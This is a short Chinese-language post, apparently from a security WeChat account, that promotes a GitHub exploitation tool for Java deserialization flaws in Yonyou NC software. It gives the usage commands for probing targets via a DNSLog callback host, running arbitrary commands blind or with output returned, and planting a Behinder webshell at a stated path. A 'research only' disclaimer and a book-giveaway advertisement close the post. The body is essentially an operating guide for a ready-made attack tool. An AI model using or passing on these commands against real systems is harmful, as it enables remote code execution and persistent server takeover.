项目作者:Ghost2097221
项目地址:https://github.com/Ghost2097221/YongyouNC-Unserialize-Tools
0x01 前言
无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。
0x02 接口检查功能
java -jar nc6.5.jar http://127.0.0.1 Check
0x03 URLDNS构造链探测
java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn
0x04 无回显命令执行
java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe
0x05 回显命令执行
java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。
0x06 落地 webshell
java -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:\Users\Administrator\Pictures\Camera Roll\1.jsp"
此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。
0x07 下载地址
1、通过项目地址下载
0x04 声明
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
推 荐 阅 读
加我微信:ivu123ivu,进送书活动群,不定时免费送书
《Python深度学习从零开始学》
本书以通俗易懂的方式详细介绍深度学习的基础理论及其相关知识,同时提供图像识别、情感分析、迁移学习、人脸识别、图像风格迁移、生成对抗网络等案例引导读者入门深度学习。